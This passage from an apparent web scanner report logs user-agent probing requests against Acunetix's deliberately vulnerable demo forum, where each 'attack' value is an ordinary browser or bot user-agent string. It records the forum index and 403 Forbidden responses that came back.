<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
| Request Header - size: 391 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:58 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 296 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:57 GMT Content-Length: 3485 |
| Response Body - size: 3,485 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Images |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 295 bytes. |
GET http://testasp.vulnweb.com/Images HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:00 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Images |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 295 bytes. |
GET http://testasp.vulnweb.com/Images HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:59 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Images |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 295 bytes. |
GET http://testasp.vulnweb.com/Images HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:58 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Images |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 317 bytes. |
GET http://testasp.vulnweb.com/Images HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:00 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Images |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 328 bytes. |
GET http://testasp.vulnweb.com/Images HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:01 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Images |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
| Request Header - size: 386 bytes. |
GET http://testasp.vulnweb.com/Images HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:02 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Images |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 291 bytes. |
GET http://testasp.vulnweb.com/Images HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:01 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 317 bytes. |
GET http://testasp.vulnweb.com/jscripts HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:02 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 317 bytes. |
GET http://testasp.vulnweb.com/jscripts HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:01 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts |
| Method | GET |
